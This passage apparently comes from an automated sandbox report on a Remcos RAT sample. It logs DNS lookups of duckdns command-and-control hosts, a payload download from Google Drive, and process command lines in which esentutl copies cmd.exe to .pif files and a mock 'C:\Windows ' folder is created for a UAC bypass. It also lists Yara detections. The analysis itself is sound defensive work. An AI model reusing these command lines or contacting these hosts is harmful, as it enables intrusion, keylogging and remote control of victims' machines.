                                                                          Nov 26, 2024 08:24:08.537224054 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.537307978 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.537319899 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.538408041 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.538467884 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.538476944 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.579416990 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.579535007 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.579544067 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.579565048 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.579623938 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.580404043 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.581453085 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.581501961 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.581510067 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.582391977 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.582439899 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.582447052 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.583373070 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.583421946 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.583430052 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.584472895 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.584528923 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.584542036 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.585443020 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.585495949 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.585503101 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.586453915 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.586502075 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.586508989 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.588308096 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.588362932 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.588368893 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.589279890 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.589329004 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.589337111 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.590262890 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.590306997 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.590315104 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.590323925 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.590363026 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.598692894 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.599019051 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.599067926 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.599075079 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.599747896 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.599798918 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.599806070 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.610490084 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.610553026 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.610568047 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.610846996 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.610893011 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.610901117 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.612019062 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.612081051 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.612092018 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.628397942 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.628443956 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.628468990 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.628483057 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.628526926 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.628896952 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.629880905 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.629930973 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.629940033 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.641804934 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.641859055 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.641877890 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.641891003 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.641947985 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.642060995 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.643007040 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.643060923 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.643074036 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.666686058 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.666765928 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.666774988 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.666785955 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.666835070 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.666846037 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.666870117 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.666918993 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.669003010 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.669028997 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:08.669037104 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:08.669044018 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:12.495877028 CET497322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:24:12.616575956 CET240449732162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:24:12.617599964 CET497322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:24:12.618349075 CET497322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:24:12.738409042 CET240449732162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:24:14.737251043 CET240449732162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:24:14.737441063 CET497322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:24:14.737441063 CET497322404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:24:14.857372999 CET240449732162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:24:15.061151028 CET497332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:24:15.181351900 CET250049733192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:24:15.181533098 CET497332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:24:15.182173967 CET497332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:24:15.302086115 CET250049733192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:24:25.642148018 CET250049733192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:24:25.642210007 CET497332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:24:26.026185036 CET497332500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:24:26.148806095 CET250049733192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:24:27.039560080 CET497402404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:24:27.159559011 CET240449740162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:24:27.159679890 CET497402404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:24:27.160183907 CET497402404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:24:27.280116081 CET240449740162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:43.902487993 CET240450034162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:45.937896013 CET240450034162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:45.938127041 CET500342404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:45.938298941 CET500342404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:46.058321953 CET240450034162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:46.277206898 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:46.397275925 CET250050035192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:46.397562027 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:46.398617983 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:46.518649101 CET250050035192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:56.973836899 CET250050035192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:56.974093914 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:56.974169016 CET500352500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:27:57.094410896 CET250050035192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:27:57.983916044 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:58.104279995 CET240450036162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:27:58.104402065 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:58.104666948 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:27:58.225984097 CET240450036162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:28:00.194520950 CET240450036162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:28:00.194704056 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:28:00.194806099 CET500362404192.168.2.4162.216.243.15
                                                                          Nov 26, 2024 08:28:00.195892096 CET500372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:28:00.315110922 CET240450036162.216.243.15192.168.2.4
                                                                          Nov 26, 2024 08:28:00.316067934 CET250050037192.169.69.26192.168.2.4
                                                                          Nov 26, 2024 08:28:00.316210985 CET500372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:28:00.316674948 CET500372500192.168.2.4192.169.69.26
                                                                          Nov 26, 2024 08:28:00.436868906 CET250050037192.169.69.26192.168.2.4
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Nov 26, 2024 08:24:01.337704897 CET | 53031 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 26, 2024 08:24:01.484606028 CET | 53 | 53031 | 1.1.1.1 | 192.168.2.4 |
| Nov 26, 2024 08:24:12.162224054 CET | 51918 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 26, 2024 08:24:12.492541075 CET | 53 | 51918 | 1.1.1.1 | 192.168.2.4 |
| Nov 26, 2024 08:24:14.738217115 CET | 62612 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 26, 2024 08:24:15.058990955 CET | 53 | 62612 | 1.1.1.1 | 192.168.2.4 |
| Nov 26, 2024 08:25:22.483184099 CET | 51228 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 26, 2024 08:25:22.817589998 CET | 53 | 51228 | 1.1.1.1 | 192.168.2.4 |
| Nov 26, 2024 08:25:25.186323881 CET | 50439 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 26, 2024 08:25:25.514955044 CET | 53 | 50439 | 1.1.1.1 | 192.168.2.4 |
| Nov 26, 2024 08:26:32.867512941 CET | 63236 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 26, 2024 08:26:33.198033094 CET | 53 | 63236 | 1.1.1.1 | 192.168.2.4 |
| Nov 26, 2024 08:26:35.396862984 CET | 60146 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 26, 2024 08:26:35.737951040 CET | 53 | 60146 | 1.1.1.1 | 192.168.2.4 |
| Nov 26, 2024 08:27:43.327270031 CET | 57912 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 26, 2024 08:27:43.660022974 CET | 53 | 57912 | 1.1.1.1 | 192.168.2.4 |
| Nov 26, 2024 08:27:45.939819098 CET | 50386 | 53 | 192.168.2.4 | 1.1.1.1 |
| Nov 26, 2024 08:27:46.275398970 CET | 53 | 50386 | 1.1.1.1 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 26, 2024 08:24:01.337704897 CET | 192.168.2.4 | 1.1.1.1 | 0x4c46 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:24:12.162224054 CET | 192.168.2.4 | 1.1.1.1 | 0xdc4e | Standard query (0) | ogcmaw.duckdns.org | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:24:14.738217115 CET | 192.168.2.4 | 1.1.1.1 | 0xb423 | Standard query (0) | emberluck.duckdns.org | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:25:22.483184099 CET | 192.168.2.4 | 1.1.1.1 | 0x1aa7 | Standard query (0) | ogcmaw.duckdns.org | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:25:25.186323881 CET | 192.168.2.4 | 1.1.1.1 | 0x8115 | Standard query (0) | emberluck.duckdns.org | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:26:32.867512941 CET | 192.168.2.4 | 1.1.1.1 | 0x9912 | Standard query (0) | ogcmaw.duckdns.org | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:26:35.396862984 CET | 192.168.2.4 | 1.1.1.1 | 0x8039 | Standard query (0) | emberluck.duckdns.org | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:27:43.327270031 CET | 192.168.2.4 | 1.1.1.1 | 0x481d | Standard query (0) | ogcmaw.duckdns.org | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:27:45.939819098 CET | 192.168.2.4 | 1.1.1.1 | 0x2194 | Standard query (0) | emberluck.duckdns.org | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 26, 2024 08:24:01.484606028 CET | 1.1.1.1 | 192.168.2.4 | 0x4c46 | No error (0) | drive.usercontent.google.com | | 142.250.181.33 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:24:12.492541075 CET | 1.1.1.1 | 192.168.2.4 | 0xdc4e | No error (0) | ogcmaw.duckdns.org | | 162.216.243.15 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:24:15.058990955 CET | 1.1.1.1 | 192.168.2.4 | 0xb423 | No error (0) | emberluck.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:24:18.646061897 CET | 1.1.1.1 | 192.168.2.4 | 0xedea | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:24:18.646061897 CET | 1.1.1.1 | 192.168.2.4 | 0xedea | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:25:22.817589998 CET | 1.1.1.1 | 192.168.2.4 | 0x1aa7 | No error (0) | ogcmaw.duckdns.org | | 162.216.243.15 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:25:25.514955044 CET | 1.1.1.1 | 192.168.2.4 | 0x8115 | No error (0) | emberluck.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:26:33.198033094 CET | 1.1.1.1 | 192.168.2.4 | 0x9912 | No error (0) | ogcmaw.duckdns.org | | 162.216.243.15 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:26:35.737951040 CET | 1.1.1.1 | 192.168.2.4 | 0x8039 | No error (0) | emberluck.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:27:43.660022974 CET | 1.1.1.1 | 192.168.2.4 | 0x481d | No error (0) | ogcmaw.duckdns.org | | 162.216.243.15 | A (IP address) | IN (0x0001) | false |
| Nov 26, 2024 08:27:46.275398970 CET | 1.1.1.1 | 192.168.2.4 | 0x2194 | No error (0) | emberluck.duckdns.org | | 192.169.69.26 | A (IP address) | IN (0x0001) | false |
• drive.usercontent.google.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.4 | 49731 | 142.250.181.33 | 443 | 6608 | C:\Users\user\Desktop\AWkpqJMxci.exe |

Timestamp | Bytes transferred | Direction | Data

2024-11-26 07:24:03 UTC | 207 | OUT | GET /download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: drive.usercontent.google.com

2024-11-26 07:24:06 UTC | 4918 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="247_Bzaszylreyg"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 1071468
Last-Modified: Sun, 15 Sep 2024 23:31:18 GMT
X-GUploader-UploadID: AFiumC6dGnfQXA2FDeSIxN3Z4rn54SU8MW3ywVeb3vIwm6z4UKx7PaTcRG1RVYV7RpZAJWek9BQD7g4RbQ
Date: Tue, 26 Nov 2024 07:24:06 GMT
Expires: Tue, 26 Nov 2024 07:24:06 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=Tmwf0w==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close

Target ID: 0
Start time: 02:23:59
Start date: 26/11/2024
Path: C:\Users\user\Desktop\AWkpqJMxci.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\AWkpqJMxci.exe"
Imagebase: 0x400000
File size: 1'339'392 bytes
MD5 hash: B4E2055B4877DCFCBF9A366106B15591
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low
Has exited: true

Target ID: 1
Start time: 02:24:08
Start date: 26/11/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" "
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 02:24:09
Start date: 26/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:02:24:09
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\esentutl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                          Imagebase:0xdd0000
                                                                          File size:352'768 bytes
                                                                          MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:02:24:09
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\esentutl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                          Imagebase:0xdd0000
                                                                          File size:352'768 bytes
                                                                          MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\esentutl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\AWkpqJMxci.exe /d C:\\Users\\Public\\Libraries\\Bzaszylr.PIF /o
                                                                          Imagebase:0xdd0000
                                                                          File size:352'768 bytes
                                                                          MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\colorcpl.exe
                                                                          Imagebase:0x1b0000
                                                                          File size:86'528 bytes
                                                                          MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:9
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:02:24:10
                                                                          Start date:26/11/2024
